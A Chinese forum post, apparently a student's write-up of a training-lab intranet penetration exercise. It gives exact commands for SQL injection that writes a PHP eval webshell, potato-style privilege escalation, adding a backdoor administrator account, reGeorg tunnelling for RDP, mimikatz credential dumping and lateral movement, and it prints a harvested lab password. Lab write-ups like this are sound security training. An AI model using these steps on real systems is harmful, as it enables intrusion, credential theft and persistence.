论坛首页 > 学习杂记

内网渗透(上)

sf171727411   ·   发表于 2023-01-12 19:40:16   ·   学习杂记

内网渗透作业(上)

在靶场写一个shell

  1. 靶场是猫舍,输入and 1=1正常,输入and 1=2报错,证明存在sql注入
  2. 在url中输入order by 2正常,3报错,并且报错中有路径C:\phpStudy\WWW\index.php,此时可以得知字段数为2以及网站的绝对路径
  3. 通过into dumpfile指令将webshell写入服务器,http://c78exn-5qmtbw.aqlab.cn/?id=1 union select 1,'<?php eval($_REQUEST[8])?>' into dumpfile 'C:/phpStudy/WWW/rocky.php',该语句的意思是:通过联合查询,在数据库中查询数据1和<?php eval($_REQUEST[8]) ?>,并将结果导出到C:/phpStudy/WWW/中的rocky.php文件中
    > - <?php eval($_REQUEST[8]) ?>是字符串,所以要加单引号
    > - 绝对路径中用反斜杠,因为原来的正斜杠会被当成转义字符把路径转义掉
    > - into dumpfile后面的路径也需要加上单引号,因为这是一个文件
  4. 访问路径http://c78exn-5qmtbw.aqlab.cn/rocky.php?8=phpinfo();,获得shell
  5. 连接蚁剑,成功进入服务器

提权

  1. 进入服务器之后,运行cmd,输入whoami,获得自己的用户为test
  2. 输入net user 查看用户情况
  3. 输入net localgroup administrators查看管理员用户组,发现没有test
  4. 通过systeminfo发现目标服务器的系统为Microsoft Windows Server 2008 R2 Standard ,内网的IP地址为:10.0.1.4
  5. 我们的目标是在网站上进行远程桌面,那么我们就需要提权,使得自己可以完全的控制目标服务器
  6. 通过systeminfo获取补丁信息,在提权辅助页面进行搜索,算是信息收集吧,找对应版本的系统能用的exp
  7. 课程提供了魔改的烂土豆程序,直接将程序通过蚁剑上传到目标服务器,改名为rocky.exe,然后终端输入指令:rocky.exe -p “whoami”,获得system系统权限
  8. 我们的目标是远程桌面连接对方服务器,所以需要自己建立一个用户,然后看对方是否开启3389
  9. 通过系统命令rocky.exe -p “net user rocky a1s2d3! /add”创建用户rocky,赋予rocky系统用户权限:rocky.exe -p “net localgroup administrators rocky /add”
  10. 通过系统命令查看是否开启3389端口:rocky.exe -p “net -ano”,发现确实开始3389
  11. 通过mstsc远程桌面连接,发现是windows server 2003 R2的机器,和目标主机不一致
  12. 原因是我们访问的网站:http://c78exn-5qmtbw.aqlab.cn对应IP59.63.166.70的3389端口不是目标服务器的端口,59.63.166.70:3389映射了该2003R2的服务器的3389端口,那么我们如果要访问目标服务器的3389的话,可以使用内网的其他服务器来进行访问

内网穿透

  1. 将reGeorg中的tunnel.php通过蚁剑传入目标服务器,改名为1234.php
  2. 在本地电脑安装proxifier汉化版,设置代理规则,设置为本地mstsc.exe程序产生的通信数据通过127.0.0.1:10080端口进行传输
  3. 运行reGeorgSocksProxy,本地运行指令:reGeorgSocksProxy.py -l 127.0.0.1 -p 10080 -u http://c78exn-5qmtbw.aqlab.cn/1234.php,意思是127.0.0.1:10080端口的数据转发给目标网站的1234.php,而该php会让目标主机进行网络访问
  4. 打开本地mstsc远程桌面,连接的服务器改为上面我们获取到的内网地址10.0.1.4,输入我们设置的账号密码,进入目标服务器的远程桌面
  5. 进入目标服务器后,上传内网渗透神器猕猴桃mimikatz,在目标服务器上,运行指令log开启日志,运行指令privilege::debug进行提权,运行sekurlsa::logonpasswords抓取登录该主机的用户名及密码,发现管理员组用户名:administrator,密码:woshifengge1.
  6. 通过nmap扫描内网开设主机,这一步太麻烦了,暂时省略
  7. 发现内网主机:10.0.1.6和10.0.1.8
  8. 使用1.4靶机用mstsc远程连接10.0.1.6,输入上面的管理员账号密码,成功进入,在桌面发现flag

遇到的问题

  1. 本人的电脑环境是macos,用pd18安装的windows11专业版虚拟机
  2. 在虚拟机中用proxifier汉化版设置代理无法抓到mstsc的数据,出了google的数据外,其他程序的流量都无法抓到,这可能和虚拟机有关,于是我换了一台windows电脑运行proxifier汉化版并设置reGeorgSocksProxy解决

打赏我,让我更有动力~

0 条回复   |  直到 2023-1-12 | 1105 次浏览
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.